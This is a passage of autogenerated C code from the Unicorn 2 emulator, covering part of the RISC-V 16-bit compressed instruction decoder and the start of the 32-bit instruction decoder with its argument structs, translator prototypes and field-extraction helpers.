/* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:97 */ decode_insn16_extract_c_li(ctx, &u.f_i, insn); if (trans_addi(ctx, &u.f_i)) return true; return false; case 0x00004002: /* 010..... 
......10 */ if ((insn & 0x00000f80) == 0x00000000) { /* 010.0000 0.....10 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:118 */ decode_insn16_extract_decode_insn16_Fmt_22(ctx, &u.f_empty, insn); if (trans_illegal(ctx, &u.f_empty)) return true; } /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:119 */ decode_insn16_extract_c_lwsp(ctx, &u.f_i, insn); if (trans_lw(ctx, &u.f_i)) return true; return false; case 0x00006000: /* 011..... ......00 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16-32.decode:20 */ decode_insn16_extract_cl_w(ctx, &u.f_i, insn); if (trans_flw(ctx, &u.f_i)) return true; return false; case 0x00006001: /* 011..... ......01 */ if ((insn & 0x0000107c) == 0x00000000) { /* 0110.... .0000001 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:99 */ decode_insn16_extract_decode_insn16_Fmt_22(ctx, &u.f_empty, insn); if (trans_illegal(ctx, &u.f_empty)) return true; } if ((insn & 0x00000f80) == 0x00000100) { /* 011.0001 0.....01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:100 */ decode_insn16_extract_c_addi16sp(ctx, &u.f_i, insn); if (trans_addi(ctx, &u.f_i)) return true; } /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:101 */ decode_insn16_extract_c_lui(ctx, &u.f_u, insn); if (trans_lui(ctx, &u.f_u)) return true; return false; case 0x00006002: /* 011..... ......10 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16-32.decode:27 */ decode_insn16_extract_c_lwsp(ctx, &u.f_i, insn); if (trans_flw(ctx, &u.f_i)) return true; return false; case 0x00008001: /* 100..... ......01 */ switch ((insn >> 10) & 0x3) { case 0x0: /* 100.00.. ......01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:103 */ decode_insn16_extract_c_shift(ctx, &u.f_shift, insn); if (trans_srli(ctx, &u.f_shift)) return true; return false; case 0x1: /* 100.01.. ......01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:104 */ decode_insn16_extract_c_shift(ctx, &u.f_shift, insn); if (trans_srai(ctx, &u.f_shift)) return true; return false; case 0x2: /* 100.10.. ......01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:105 */ decode_insn16_extract_c_andi(ctx, &u.f_i, insn); if (trans_andi(ctx, &u.f_i)) return true; return false; case 0x3: /* 100.11.. ......01 */ decode_insn16_extract_cs_2(ctx, &u.f_r, insn); switch (insn & 0x00001060) { case 0x00000000: /* 100011.. .00...01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:106 */ if (trans_sub(ctx, &u.f_r)) return true; return false; case 0x00000020: /* 100011.. .01...01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:107 */ if (trans_xor(ctx, &u.f_r)) return true; return false; case 0x00000040: /* 100011.. .10...01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:108 */ if (trans_or(ctx, &u.f_r)) return true; return false; case 0x00000060: /* 100011.. .11...01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:109 */ if (trans_and(ctx, &u.f_r)) return true; return false; } return false; } return false; case 0x00008002: /* 100..... ......10 */ switch ((insn >> 12) & 0x1) { case 0x0: /* 1000.... 
......10 */ if ((insn & 0x00000ffc) == 0x00000000) { /* 10000000 00000010 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:122 */ decode_insn16_extract_decode_insn16_Fmt_22(ctx, &u.f_empty, insn); if (trans_illegal(ctx, &u.f_empty)) return true; } if ((insn & 0x0000007c) == 0x00000000) { /* 1000.... .0000010 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:123 */ decode_insn16_extract_c_jalr(ctx, &u.f_i, insn); u.f_i.rd = 0; if (trans_jalr(ctx, &u.f_i)) return true; } /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:124 */ decode_insn16_extract_c_mv(ctx, &u.f_i, insn); if (trans_addi(ctx, &u.f_i)) return true; return false; case 0x1: /* 1001.... ......10 */ if ((insn & 0x00000ffc) == 0x00000000) { /* 10010000 00000010 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:127 */ decode_insn16_extract_decode_insn16_Fmt_22(ctx, &u.f_empty, insn); if (trans_ebreak(ctx, &u.f_empty)) return true; } if ((insn & 0x0000007c) == 0x00000000) { /* 1001.... .0000010 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:128 */ decode_insn16_extract_c_jalr(ctx, &u.f_i, insn); u.f_i.rd = 1; if (trans_jalr(ctx, &u.f_i)) return true; } /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:129 */ decode_insn16_extract_cr(ctx, &u.f_r, insn); if (trans_add(ctx, &u.f_r)) return true; return false; } return false; case 0x0000a000: /* 101..... ......00 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:92 */ decode_insn16_extract_cs_d(ctx, &u.f_s, insn); if (trans_fsd(ctx, &u.f_s)) return true; return false; case 0x0000a001: /* 101..... ......01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:110 */ decode_insn16_extract_cj(ctx, &u.f_j, insn); u.f_j.rd = 0; if (trans_jal(ctx, &u.f_j)) return true; return false; case 0x0000a002: /* 101..... ......10 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:131 */ decode_insn16_extract_c_sdsp(ctx, &u.f_s, insn); if (trans_fsd(ctx, &u.f_s)) return true; return false; case 0x0000c000: /* 110..... ......00 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:93 */ decode_insn16_extract_cs_w(ctx, &u.f_s, insn); if (trans_sw(ctx, &u.f_s)) return true; return false; case 0x0000c001: /* 110..... ......01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:111 */ decode_insn16_extract_cb_z(ctx, &u.f_b, insn); if (trans_beq(ctx, &u.f_b)) return true; return false; case 0x0000c002: /* 110..... ......10 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:132 */ decode_insn16_extract_c_swsp(ctx, &u.f_s, insn); if (trans_sw(ctx, &u.f_s)) return true; return false; case 0x0000e000: /* 111..... ......00 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16-32.decode:21 */ decode_insn16_extract_cs_w(ctx, &u.f_s, insn); if (trans_fsw(ctx, &u.f_s)) return true; return false; case 0x0000e001: /* 111..... ......01 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16.decode:112 */ decode_insn16_extract_cb_z(ctx, &u.f_b, insn); if (trans_bne(ctx, &u.f_b)) return true; return false; case 0x0000e002: /* 111..... 
......10 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn16-32.decode:28 */ decode_insn16_extract_c_swsp(ctx, &u.f_s, insn); if (trans_fsw(ctx, &u.f_s)) return true; return false; } return false; }

unicorn-2.1.1/qemu/target/riscv/riscv32/decode_insn32.inc.c

/* This file is autogenerated by scripts/decodetree.py. */ typedef struct { int aq; int rd; int rl; int rs1; int rs2; } arg_atomic; typedef struct { int imm; int rs1; int rs2; } arg_b; typedef struct { int rd; int rm; int rs1; int rs2; int rs3; } arg_decode_insn3210; typedef struct { int rd; int rm; int rs1; int rs2; } arg_decode_insn3211; typedef struct { int rd; int rm; int rs1; } arg_decode_insn3212; typedef struct { int rd; int rs1; } arg_decode_insn3213; typedef struct { int rs1; int rs2; } arg_decode_insn3214; typedef struct { int rs1; } arg_decode_insn3215; typedef struct { int pred; int succ; } arg_decode_insn3216; typedef struct { int csr; int rd; int rs1; } arg_decode_insn329; typedef struct { #ifdef _MSC_VER int dummy; // MSVC does not allow empty struct #endif } arg_empty; typedef struct { int imm; int rd; int rs1; } arg_i; typedef struct { int imm; int rd; } arg_j; typedef struct { int rd; int rs1; int rs2; } arg_r; typedef struct { int imm; int rs1; int rs2; } arg_s; typedef struct { int rd; int rs1; int shamt; } arg_shift; typedef struct { int imm; int rd; } arg_u; typedef arg_empty arg_ecall; static bool trans_ecall(DisasContext *ctx, arg_ecall *a); typedef arg_empty arg_ebreak; static bool trans_ebreak(DisasContext *ctx, arg_ebreak *a); typedef arg_empty arg_uret; static bool trans_uret(DisasContext *ctx, arg_uret *a); typedef arg_empty arg_sret; static bool trans_sret(DisasContext *ctx, arg_sret *a); typedef arg_empty arg_mret; static bool trans_mret(DisasContext *ctx, arg_mret *a); typedef arg_empty arg_wfi; static bool trans_wfi(DisasContext *ctx, arg_wfi *a); typedef arg_decode_insn3214 arg_hfence_gvma; static bool trans_hfence_gvma(DisasContext *ctx, arg_hfence_gvma *a); typedef arg_decode_insn3214 arg_hfence_bvma; static bool trans_hfence_bvma(DisasContext *ctx, arg_hfence_bvma *a); typedef arg_decode_insn3214 arg_sfence_vma; static bool trans_sfence_vma(DisasContext *ctx, arg_sfence_vma *a); typedef arg_decode_insn3215 arg_sfence_vm; static bool trans_sfence_vm(DisasContext *ctx, arg_sfence_vm *a); typedef arg_u arg_lui; static bool trans_lui(DisasContext *ctx, arg_lui *a); typedef arg_u arg_auipc; static bool trans_auipc(DisasContext *ctx, arg_auipc *a); typedef arg_j arg_jal; static bool trans_jal(DisasContext *ctx, arg_jal *a); typedef arg_i arg_jalr; static bool trans_jalr(DisasContext *ctx, arg_jalr *a); typedef arg_b
arg_beq; static bool trans_beq(DisasContext *ctx, arg_beq *a); typedef arg_b arg_bne; static bool trans_bne(DisasContext *ctx, arg_bne *a); typedef arg_b arg_blt; static bool trans_blt(DisasContext *ctx, arg_blt *a); typedef arg_b arg_bge; static bool trans_bge(DisasContext *ctx, arg_bge *a); typedef arg_b arg_bltu; static bool trans_bltu(DisasContext *ctx, arg_bltu *a); typedef arg_b arg_bgeu; static bool trans_bgeu(DisasContext *ctx, arg_bgeu *a); typedef arg_i arg_lb; static bool trans_lb(DisasContext *ctx, arg_lb *a); typedef arg_i arg_lh; static bool trans_lh(DisasContext *ctx, arg_lh *a); typedef arg_i arg_lw; static bool trans_lw(DisasContext *ctx, arg_lw *a); typedef arg_i arg_lbu; static bool trans_lbu(DisasContext *ctx, arg_lbu *a); typedef arg_i arg_lhu; static bool trans_lhu(DisasContext *ctx, arg_lhu *a); typedef arg_s arg_sb; static bool trans_sb(DisasContext *ctx, arg_sb *a); typedef arg_s arg_sh; static bool trans_sh(DisasContext *ctx, arg_sh *a); typedef arg_s arg_sw; static bool trans_sw(DisasContext *ctx, arg_sw *a); typedef arg_i arg_addi; static bool trans_addi(DisasContext *ctx, arg_addi *a); typedef arg_i arg_slti; static bool trans_slti(DisasContext *ctx, arg_slti *a); typedef arg_i arg_sltiu; static bool trans_sltiu(DisasContext *ctx, arg_sltiu *a); typedef arg_i arg_xori; static bool trans_xori(DisasContext *ctx, arg_xori *a); typedef arg_i arg_ori; static bool trans_ori(DisasContext *ctx, arg_ori *a); typedef arg_i arg_andi; static bool trans_andi(DisasContext *ctx, arg_andi *a); typedef arg_shift arg_slli; static bool trans_slli(DisasContext *ctx, arg_slli *a); typedef arg_shift arg_srli; static bool trans_srli(DisasContext *ctx, arg_srli *a); typedef arg_shift arg_srai; static bool trans_srai(DisasContext *ctx, arg_srai *a); typedef arg_r arg_add; static bool trans_add(DisasContext *ctx, arg_add *a); typedef arg_r arg_sub; static bool trans_sub(DisasContext *ctx, arg_sub *a); typedef arg_r arg_sll; static bool trans_sll(DisasContext *ctx, arg_sll *a); typedef arg_r arg_slt; static bool trans_slt(DisasContext *ctx, arg_slt *a); typedef arg_r arg_sltu; static bool trans_sltu(DisasContext *ctx, arg_sltu *a); typedef arg_r arg_xor; static bool trans_xor(DisasContext *ctx, arg_xor *a); typedef arg_r arg_srl; static bool trans_srl(DisasContext *ctx, arg_srl *a); typedef arg_r arg_sra; static bool trans_sra(DisasContext *ctx, arg_sra *a); typedef arg_r arg_or; static bool trans_or(DisasContext *ctx, arg_or *a); typedef arg_r arg_and; static bool trans_and(DisasContext *ctx, arg_and *a); typedef arg_decode_insn3216 arg_fence; static bool trans_fence(DisasContext *ctx, arg_fence *a); typedef arg_empty arg_fence_i; static bool trans_fence_i(DisasContext *ctx, arg_fence_i *a); typedef arg_decode_insn329 arg_csrrw; static bool trans_csrrw(DisasContext *ctx, arg_csrrw *a); typedef arg_decode_insn329 arg_csrrs; static bool trans_csrrs(DisasContext *ctx, arg_csrrs *a); typedef arg_decode_insn329 arg_csrrc; static bool trans_csrrc(DisasContext *ctx, arg_csrrc *a); typedef arg_decode_insn329 arg_csrrwi; static bool trans_csrrwi(DisasContext *ctx, arg_csrrwi *a); typedef arg_decode_insn329 arg_csrrsi; static bool trans_csrrsi(DisasContext *ctx, arg_csrrsi *a); typedef arg_decode_insn329 arg_csrrci; static bool trans_csrrci(DisasContext *ctx, arg_csrrci *a); typedef arg_r arg_mul; static bool trans_mul(DisasContext *ctx, arg_mul *a); typedef arg_r arg_mulh; static bool trans_mulh(DisasContext *ctx, arg_mulh *a); typedef arg_r arg_mulhsu; static bool trans_mulhsu(DisasContext 
*ctx, arg_mulhsu *a); typedef arg_r arg_mulhu; static bool trans_mulhu(DisasContext *ctx, arg_mulhu *a); typedef arg_r arg_div; static bool trans_div(DisasContext *ctx, arg_div *a); typedef arg_r arg_divu; static bool trans_divu(DisasContext *ctx, arg_divu *a); typedef arg_r arg_rem; static bool trans_rem(DisasContext *ctx, arg_rem *a); typedef arg_r arg_remu; static bool trans_remu(DisasContext *ctx, arg_remu *a); typedef arg_atomic arg_lr_w; static bool trans_lr_w(DisasContext *ctx, arg_lr_w *a); typedef arg_atomic arg_sc_w; static bool trans_sc_w(DisasContext *ctx, arg_sc_w *a); typedef arg_atomic arg_amoswap_w; static bool trans_amoswap_w(DisasContext *ctx, arg_amoswap_w *a); typedef arg_atomic arg_amoadd_w; static bool trans_amoadd_w(DisasContext *ctx, arg_amoadd_w *a); typedef arg_atomic arg_amoxor_w; static bool trans_amoxor_w(DisasContext *ctx, arg_amoxor_w *a); typedef arg_atomic arg_amoand_w; static bool trans_amoand_w(DisasContext *ctx, arg_amoand_w *a); typedef arg_atomic arg_amoor_w; static bool trans_amoor_w(DisasContext *ctx, arg_amoor_w *a); typedef arg_atomic arg_amomin_w; static bool trans_amomin_w(DisasContext *ctx, arg_amomin_w *a); typedef arg_atomic arg_amomax_w; static bool trans_amomax_w(DisasContext *ctx, arg_amomax_w *a); typedef arg_atomic arg_amominu_w; static bool trans_amominu_w(DisasContext *ctx, arg_amominu_w *a); typedef arg_atomic arg_amomaxu_w; static bool trans_amomaxu_w(DisasContext *ctx, arg_amomaxu_w *a); typedef arg_i arg_flw; static bool trans_flw(DisasContext *ctx, arg_flw *a); typedef arg_s arg_fsw; static bool trans_fsw(DisasContext *ctx, arg_fsw *a); typedef arg_decode_insn3210 arg_fmadd_s; static bool trans_fmadd_s(DisasContext *ctx, arg_fmadd_s *a); typedef arg_decode_insn3210 arg_fmsub_s; static bool trans_fmsub_s(DisasContext *ctx, arg_fmsub_s *a); typedef arg_decode_insn3210 arg_fnmsub_s; static bool trans_fnmsub_s(DisasContext *ctx, arg_fnmsub_s *a); typedef arg_decode_insn3210 arg_fnmadd_s; static bool trans_fnmadd_s(DisasContext *ctx, arg_fnmadd_s *a); typedef arg_decode_insn3211 arg_fadd_s; static bool trans_fadd_s(DisasContext *ctx, arg_fadd_s *a); typedef arg_decode_insn3211 arg_fsub_s; static bool trans_fsub_s(DisasContext *ctx, arg_fsub_s *a); typedef arg_decode_insn3211 arg_fmul_s; static bool trans_fmul_s(DisasContext *ctx, arg_fmul_s *a); typedef arg_decode_insn3211 arg_fdiv_s; static bool trans_fdiv_s(DisasContext *ctx, arg_fdiv_s *a); typedef arg_decode_insn3212 arg_fsqrt_s; static bool trans_fsqrt_s(DisasContext *ctx, arg_fsqrt_s *a); typedef arg_r arg_fsgnj_s; static bool trans_fsgnj_s(DisasContext *ctx, arg_fsgnj_s *a); typedef arg_r arg_fsgnjn_s; static bool trans_fsgnjn_s(DisasContext *ctx, arg_fsgnjn_s *a); typedef arg_r arg_fsgnjx_s; static bool trans_fsgnjx_s(DisasContext *ctx, arg_fsgnjx_s *a); typedef arg_r arg_fmin_s; static bool trans_fmin_s(DisasContext *ctx, arg_fmin_s *a); typedef arg_r arg_fmax_s; static bool trans_fmax_s(DisasContext *ctx, arg_fmax_s *a); typedef arg_decode_insn3212 arg_fcvt_w_s; static bool trans_fcvt_w_s(DisasContext *ctx, arg_fcvt_w_s *a); typedef arg_decode_insn3212 arg_fcvt_wu_s; static bool trans_fcvt_wu_s(DisasContext *ctx, arg_fcvt_wu_s *a); typedef arg_decode_insn3213 arg_fmv_x_w; static bool trans_fmv_x_w(DisasContext *ctx, arg_fmv_x_w *a); typedef arg_r arg_feq_s; static bool trans_feq_s(DisasContext *ctx, arg_feq_s *a); typedef arg_r arg_flt_s; static bool trans_flt_s(DisasContext *ctx, arg_flt_s *a); typedef arg_r arg_fle_s; static bool trans_fle_s(DisasContext *ctx, arg_fle_s *a); 
typedef arg_decode_insn3213 arg_fclass_s; static bool trans_fclass_s(DisasContext *ctx, arg_fclass_s *a); typedef arg_decode_insn3212 arg_fcvt_s_w; static bool trans_fcvt_s_w(DisasContext *ctx, arg_fcvt_s_w *a); typedef arg_decode_insn3212 arg_fcvt_s_wu; static bool trans_fcvt_s_wu(DisasContext *ctx, arg_fcvt_s_wu *a); typedef arg_decode_insn3213 arg_fmv_w_x; static bool trans_fmv_w_x(DisasContext *ctx, arg_fmv_w_x *a); typedef arg_i arg_fld; static bool trans_fld(DisasContext *ctx, arg_fld *a); typedef arg_s arg_fsd; static bool trans_fsd(DisasContext *ctx, arg_fsd *a); typedef arg_decode_insn3210 arg_fmadd_d; static bool trans_fmadd_d(DisasContext *ctx, arg_fmadd_d *a); typedef arg_decode_insn3210 arg_fmsub_d; static bool trans_fmsub_d(DisasContext *ctx, arg_fmsub_d *a); typedef arg_decode_insn3210 arg_fnmsub_d; static bool trans_fnmsub_d(DisasContext *ctx, arg_fnmsub_d *a); typedef arg_decode_insn3210 arg_fnmadd_d; static bool trans_fnmadd_d(DisasContext *ctx, arg_fnmadd_d *a); typedef arg_decode_insn3211 arg_fadd_d; static bool trans_fadd_d(DisasContext *ctx, arg_fadd_d *a); typedef arg_decode_insn3211 arg_fsub_d; static bool trans_fsub_d(DisasContext *ctx, arg_fsub_d *a); typedef arg_decode_insn3211 arg_fmul_d; static bool trans_fmul_d(DisasContext *ctx, arg_fmul_d *a); typedef arg_decode_insn3211 arg_fdiv_d; static bool trans_fdiv_d(DisasContext *ctx, arg_fdiv_d *a); typedef arg_decode_insn3212 arg_fsqrt_d; static bool trans_fsqrt_d(DisasContext *ctx, arg_fsqrt_d *a); typedef arg_r arg_fsgnj_d; static bool trans_fsgnj_d(DisasContext *ctx, arg_fsgnj_d *a); typedef arg_r arg_fsgnjn_d; static bool trans_fsgnjn_d(DisasContext *ctx, arg_fsgnjn_d *a); typedef arg_r arg_fsgnjx_d; static bool trans_fsgnjx_d(DisasContext *ctx, arg_fsgnjx_d *a); typedef arg_r arg_fmin_d; static bool trans_fmin_d(DisasContext *ctx, arg_fmin_d *a); typedef arg_r arg_fmax_d; static bool trans_fmax_d(DisasContext *ctx, arg_fmax_d *a); typedef arg_decode_insn3212 arg_fcvt_s_d; static bool trans_fcvt_s_d(DisasContext *ctx, arg_fcvt_s_d *a); typedef arg_decode_insn3212 arg_fcvt_d_s; static bool trans_fcvt_d_s(DisasContext *ctx, arg_fcvt_d_s *a); typedef arg_r arg_feq_d; static bool trans_feq_d(DisasContext *ctx, arg_feq_d *a); typedef arg_r arg_flt_d; static bool trans_flt_d(DisasContext *ctx, arg_flt_d *a); typedef arg_r arg_fle_d; static bool trans_fle_d(DisasContext *ctx, arg_fle_d *a); typedef arg_decode_insn3213 arg_fclass_d; static bool trans_fclass_d(DisasContext *ctx, arg_fclass_d *a); typedef arg_decode_insn3212 arg_fcvt_w_d; static bool trans_fcvt_w_d(DisasContext *ctx, arg_fcvt_w_d *a); typedef arg_decode_insn3212 arg_fcvt_wu_d; static bool trans_fcvt_wu_d(DisasContext *ctx, arg_fcvt_wu_d *a); typedef arg_decode_insn3212 arg_fcvt_d_w; static bool trans_fcvt_d_w(DisasContext *ctx, arg_fcvt_d_w *a); typedef arg_decode_insn3212 arg_fcvt_d_wu; static bool trans_fcvt_d_wu(DisasContext *ctx, arg_fcvt_d_wu *a); static void decode_insn32_extract_atom_ld(DisasContext *ctx, arg_atomic *a, uint32_t insn) { a->aq = extract32(insn, 26, 1); a->rl = extract32(insn, 25, 1); a->rs2 = 0; a->rs1 = extract32(insn, 15, 5); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_atom_st(DisasContext *ctx, arg_atomic *a, uint32_t insn) { a->aq = extract32(insn, 26, 1); a->rl = extract32(insn, 25, 1); a->rs2 = extract32(insn, 20, 5); a->rs1 = extract32(insn, 15, 5); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_b(DisasContext *ctx, arg_b *a, uint32_t insn) { a->imm = ex_shift_1(ctx, 
deposit32(deposit32(deposit32(extract32(insn, 8, 4), 4, 28, extract32(insn, 25, 6)), 10, 22, extract32(insn, 7, 1)), 11, 21, sextract32(insn, 31, 1))); a->rs2 = extract32(insn, 20, 5); a->rs1 = extract32(insn, 15, 5); } static void decode_insn32_extract_csr(DisasContext *ctx, arg_decode_insn329 *a, uint32_t insn) { a->csr = extract32(insn, 20, 12); a->rs1 = extract32(insn, 15, 5); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_decode_insn32_Fmt_18(DisasContext *ctx, arg_empty *a, uint32_t insn) { } static void decode_insn32_extract_decode_insn32_Fmt_19(DisasContext *ctx, arg_decode_insn3216 *a, uint32_t insn) { a->pred = extract32(insn, 24, 4); a->succ = extract32(insn, 20, 4); } static void decode_insn32_extract_hfence_bvma(DisasContext *ctx, arg_decode_insn3214 *a, uint32_t insn) { a->rs2 = extract32(insn, 20, 5); a->rs1 = extract32(insn, 15, 5); } static void decode_insn32_extract_hfence_gvma(DisasContext *ctx, arg_decode_insn3214 *a, uint32_t insn) { a->rs2 = extract32(insn, 20, 5); a->rs1 = extract32(insn, 15, 5); } static void decode_insn32_extract_i(DisasContext *ctx, arg_i *a, uint32_t insn) { a->imm = sextract32(insn, 20, 12); a->rs1 = extract32(insn, 15, 5); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_j(DisasContext *ctx, arg_j *a, uint32_t insn) { a->imm = ex_shift_1(ctx, deposit32(deposit32(deposit32(extract32(insn, 21, 10), 10, 22, extract32(insn, 20, 1)), 11, 21, extract32(insn, 12, 8)), 19, 13, sextract32(insn, 31, 1))); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_r(DisasContext *ctx, arg_r *a, uint32_t insn) { a->rs2 = extract32(insn, 20, 5); a->rs1 = extract32(insn, 15, 5); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_r2(DisasContext *ctx, arg_decode_insn3213 *a, uint32_t insn) { a->rs1 = extract32(insn, 15, 5); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_r2_rm(DisasContext *ctx, arg_decode_insn3212 *a, uint32_t insn) { a->rs1 = extract32(insn, 15, 5); a->rm = extract32(insn, 12, 3); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_r4_rm(DisasContext *ctx, arg_decode_insn3210 *a, uint32_t insn) { a->rs3 = extract32(insn, 27, 5); a->rs2 = extract32(insn, 20, 5); a->rs1 = extract32(insn, 15, 5); a->rm = extract32(insn, 12, 3); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_r_rm(DisasContext *ctx, arg_decode_insn3211 *a, uint32_t insn) { a->rs2 = extract32(insn, 20, 5); a->rs1 = extract32(insn, 15, 5); a->rm = extract32(insn, 12, 3); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_s(DisasContext *ctx, arg_s *a, uint32_t insn) { a->imm = deposit32(extract32(insn, 7, 5), 5, 27, sextract32(insn, 25, 7)); a->rs2 = extract32(insn, 20, 5); a->rs1 = extract32(insn, 15, 5); } static void decode_insn32_extract_sfence_vm(DisasContext *ctx, arg_decode_insn3215 *a, uint32_t insn) { a->rs1 = extract32(insn, 15, 5); } static void decode_insn32_extract_sfence_vma(DisasContext *ctx, arg_decode_insn3214 *a, uint32_t insn) { a->rs2 = extract32(insn, 20, 5); a->rs1 = extract32(insn, 15, 5); } static void decode_insn32_extract_sh(DisasContext *ctx, arg_shift *a, uint32_t insn) { a->shamt = extract32(insn, 20, 10); a->rs1 = extract32(insn, 15, 5); a->rd = extract32(insn, 7, 5); } static void decode_insn32_extract_u(DisasContext *ctx, arg_u *a, uint32_t insn) { a->imm = ex_shift_12(ctx, sextract32(insn, 12, 20)); a->rd = extract32(insn, 7, 5); } static bool decode_insn32(DisasContext *ctx, uint32_t insn) { union { arg_atomic 
f_atomic; arg_b f_b; arg_decode_insn3210 f_decode_insn3210; arg_decode_insn3211 f_decode_insn3211; arg_decode_insn3212 f_decode_insn3212; arg_decode_insn3213 f_decode_insn3213; arg_decode_insn3214 f_decode_insn3214; arg_decode_insn3215 f_decode_insn3215; arg_decode_insn3216 f_decode_insn3216; arg_decode_insn329 f_decode_insn329; arg_empty f_empty; arg_i f_i; arg_j f_j; arg_r f_r; arg_s f_s; arg_shift f_shift; arg_u f_u; } u; switch (insn & 0x0000007f) { case 0x00000003: /* ........ ........ ........ .0000011 */ decode_insn32_extract_i(ctx, &u.f_i, insn); switch ((insn >> 12) & 0x7) { case 0x0: /* ........ ........ .000.... .0000011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:96 */ if (trans_lb(ctx, &u.f_i)) return true; return false; case 0x1: /* ........ ........ .001.... .0000011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:97 */ if (trans_lh(ctx, &u.f_i)) return true; return false; case 0x2: /* ........ ........ .010.... .0000011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:98 */ if (trans_lw(ctx, &u.f_i)) return true; return false; case 0x4: /* ........ ........ .100.... .0000011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:99 */ if (trans_lbu(ctx, &u.f_i)) return true; return false; case 0x5: /* ........ ........ .101.... .0000011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:100 */ if (trans_lhu(ctx, &u.f_i)) return true; return false; } return false; case 0x00000007: /* ........ ........ ........ .0000111 */ decode_insn32_extract_i(ctx, &u.f_i, insn); switch ((insn >> 12) & 0x7) { case 0x2: /* ........ ........ .010.... .0000111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:156 */ if (trans_flw(ctx, &u.f_i)) return true; return false; case 0x3: /* ........ ........ .011.... .0000111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:184 */ if (trans_fld(ctx, &u.f_i)) return true; return false; } return false; case 0x0000000f: /* ........ ........ ........ .0001111 */ switch ((insn >> 12) & 0x7) { case 0x0: /* ........ ........ .000.... .0001111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:123 */ decode_insn32_extract_decode_insn32_Fmt_19(ctx, &u.f_decode_insn3216, insn); if (trans_fence(ctx, &u.f_decode_insn3216)) return true; return false; case 0x1: /* ........ ........ .001.... .0001111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:124 */ decode_insn32_extract_decode_insn32_Fmt_18(ctx, &u.f_empty, insn); if (trans_fence_i(ctx, &u.f_empty)) return true; return false; } return false; case 0x00000013: /* ........ ........ ........ .0010011 */ switch ((insn >> 12) & 0x7) { case 0x0: /* ........ ........ .000.... .0010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:104 */ decode_insn32_extract_i(ctx, &u.f_i, insn); if (trans_addi(ctx, &u.f_i)) return true; return false; case 0x1: /* ........ ........ .001.... .0010011 */ decode_insn32_extract_sh(ctx, &u.f_shift, insn); switch ((insn >> 30) & 0x3) { case 0x0: /* 00...... ........ .001.... .0010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:110 */ if (trans_slli(ctx, &u.f_shift)) return true; return false; } return false; case 0x2: /* ........ ........ .010.... 
